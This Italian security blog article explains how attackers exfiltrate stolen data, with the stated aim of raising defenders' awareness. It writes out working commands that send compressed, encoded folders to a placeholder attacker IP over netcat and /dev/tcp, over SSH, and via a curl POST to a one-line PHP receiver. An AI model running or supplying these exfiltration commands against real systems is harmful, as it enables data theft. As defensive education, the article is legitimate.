Fernando Curzi : 19 Dicembre 2022 08:13
Abbiamo più volte parlato di Data Breach con Red Hot Cyber , grosse mole di dati esfiltrati da banche dati e rivenduti sul darkweb. Ma come avvengono tecnicamente queste transizioni?
In teoria una volta che il cyber criminale è stato in grado di mettere mano sulle informazioni sensibili attraverso uno sfruttamento di una Backdoor o di una sessione persistente APT (Advanced Session Threat), avrà necessità di spostare questi dati al di fuori dell’infrastruttura in modo sicuro e il più inosservato possibile all’interno di sistemi gestiti dall’organizzazione criminale.
La fantasia in questi scenari non tarda ad arrivare.
 Scarica Gratuitamente Byte The Silence, il fumetto sul Cyberbullismo di Red Hot Cyber"Il cyberbullismo è una delle minacce più insidiose e silenziose che colpiscono i nostri ragazzi. Non si tratta di semplici "bravate online", ma di veri e propri atti di violenza digitale, capaci di lasciare ferite profonde e spesso irreversibili nell’animo delle vittime. Non possiamo più permetterci di chiudere gli occhi". Così si apre la prefazione del fumetto di Massimiliano Brolli, fondatore di Red Hot Cyber, un’opera che affronta con sensibilità e realismo uno dei temi più urgenti della nostra epoca. Distribuito gratuitamente, questo fumetto nasce con l'obiettivo di sensibilizzare e informare. È uno strumento pensato per scuole, insegnanti, genitori e vittime, ma anche per chi, per qualsiasi ragione, si è ritrovato nel ruolo del bullo, affinché possa comprendere, riflettere e cambiare. Con la speranza che venga letto, condiviso e discusso, Red Hot Cyber è orgogliosa di offrire un contributo concreto per costruire una cultura digitale più consapevole, empatica e sicura. Contattaci tramite WhatsApp al numero 375 593 1011 per richiedere ulteriori informazioni oppure alla casella di posta [email protected]
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
Con questo articolo si cerca di mostrare come avvengono le esfiltrazioni in modo da sensibilizzare i tecnici ponendo l’ attenzione su alcune configurazioni di policy di networking che non dovrebbero essere tralasciate.
Uno dei metodi più comuni da attuare è quello che prevede la creazione di un socket TCP locale sul sistema vittima che punta alla macchina dell’attaccante, dualmente su quest’ultima potrebbe essere configurato un Listner con Netcat che si mette in ascolto per la ricezione dei dati.
In genere gli aggressori per evitare il monitoraggio on-the-wire effettuano compressioni e codifiche dei dati in Base64 ed EBCDIC (Extended Binary Codec Decimal Interchange Code) e solo dopo queste prime procedure avviano il vero trasferimento dei dati verso il proprio sistema ove verranno poi decodificati.
Vediamo alcuni comandi che potrebbe utilizzare un malintenzionato nell’attività di data exfiltration:
L’aggressore sul suo sistema, per prima cosa configura un listner con Netcat sulla porta TCP/80 per ricevere i dati in entrata reindirizzando l’output ad un file “data.tmp”
Il comando è:
nc –nlvpc 80 > data.tmp
Sul sistema vittima (si sottointende che sia già violato) potrebbe avere senso una compressione della cartella da esfiltrare sull’output standard (stdout) (-) codificando il tutto con Base64 e EBCID, reindirizzando subito dopo i dati sul proprio socket TCP locale della sua macchina. Nell’esempio che ho fatto data.tmp è la cartella contenente i dati da esfiltrare. Il comando completo potrebbe essere questo:
tar zfc - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<indirizzoIP_attaccante>/80
Sulla macchina attaccante l’aggressore decodifica il file data.tmp sull’output data.tar
dd conv=ascii if=data.tmp |base64 –d > data.tar
L’aggressore estrae l’archivio data.tar sul proprio sistema avendo disponibilità dei dati in chiaro.
Un altro metodo un po’ più semplice e altrettanto comune è quello di non codificare i dati in transito nella rete ma cifrarli utilizzando il protocollo SSH. Il metodo con cifratura potrebbe avere migliori probabilità di eludere qualsiasi sistema di monitoraggio nella rete da parte degli IPS e IDS.
Sul sistema vittima , l’aggressore esegue il comando:
tar zfc - /tmp/data | ssh root@<indirizzoIP_attaccante> “cd /tmp; tar zxpf –“
Sul sistema attaccante i dati sono già decompressi nella cartella tmp/data e potrà visualizzarli direttamente.
Per una maggiore “furtività”, potrebbe configurare un suo server SSH sulla porta 80 e non sulla porta 22 utilizzata comunemente da SSH.
Il terzo metodo ha un paio di prerequisiti ma è un altro ottimo modo per trasferire dati su protocolli cifrati, in questo caso Https con certificati SSL.
Per svolgere questo tipo di esfiltrazione l’aggressore deve disporre necessariamente un web server con PHP e un certificato SSL installato.
Sul sistema attaccante, l’aggressore potrebbe creare un file PHP che scriverà i dati ricevuti come POST request all’interno di un file chiamato /tmp/datafolder.base64 , per distinguerlo chiamerò questo file “contact.php”. Per una maggiore furtività il codice contenuto del file potrebbe essere inserito in single line (in una riga).
Contact.php
<?php file_put_contents(‘/tmp/data.base64’, file_get_contents(‘php://input’)); ?>
Sul sistema vittima l’aggressore invierà il comando curl con una richiesta POST costituita dai dati compressi e codificati in tar e Base64 dalla directory /tmp/data della vittima, che si tradurrà in una richiesta POST al file contact.php sul web server da lui gestito che svolgerà la funzione di scrivere una copia dell’archivio. Il comando potrebbe essere questo:
curl --data “$(tar zcf - /tmp/data | base64)” https://<indirizzoIP_attaccante>/contact.php
La macchina dell’attaccante dopo aver ricevuto i dati via POST li ha scritti nel file /tmp/data.base64 reindirizzando l’output ad un archivio data.tar
cat /tmp/data.base64 | base64 –d > data.tar && tar xf data.tar
Questi sono solo alcuni esempi di tecniche exfiltration ma considerando che ormai l’avvento dei ransomware ha reso il tutto più dinamico, molti di questi comandi insieme ad altri vengono introdotti e integrati all’interno del codice sorgente dei malware. Un buon sistema di monitoraggio abbinato ad un adeguato grado di sicurezza dei sistemi potrebbe bloccare un eventuale data breach, e con “buon sistema di monitoraggio” intendo in questo caso che non bisogna tralasciare nessun protocollo, ignorare il monitoraggio sui protocolli di rete che svolgono determinate funzioni considerate “sicure” come per esempio il “DNS” non è una buona pratica e vanno assolutamente monitorati e attuate policy adeguate che non ritengo opportuno elencare in questo articolo. Su questo argomento comunque ci ritorneremo con Hackerhood, per gli scettici vedremo un tutorial completo di come avviene una creazione di un server per un’esfiltrazione via DNS e una triangolazione verso il sistema attaccante.
Fernando CurziNella giornata di oggi, migliaia di utenti Fastweb in tutta Italia hanno segnalato problemi di connessione alla rete fissa, con interruzioni improvvise del servizio Internet e difficoltà a navigare o...
Mattinata difficile per i clienti Fastweb: dalle 9:30 circa, il numero di segnalazioni di malfunzionamento è schizzato alle stelle. Secondo i dati di Downdetector, le interruzioni hanno superato le 3...
Dopo il successo dello scorso anno, Scientifica lancia la nuova edizione di GlitchZone, la competition dedicata alle start-up che sviluppano soluzioni innovative per la cybersecurity. L’iniziativa �...
Il ricercatore di sicurezza Alessandro Sgreccia, membro del team HackerHood di Red Hot Cyber, ha segnalato a Zyxel due nuove vulnerabilità che interessano diversi dispositivi della famiglia ZLD (ATP ...
La Cybersecurity and Infrastructure Security Agency (CISA) e il Multi-State Information Sharing & Analysis Center (MS-ISAC) pubblicano questo avviso congiunto sulla sicurezza informatica (CSA) in ...
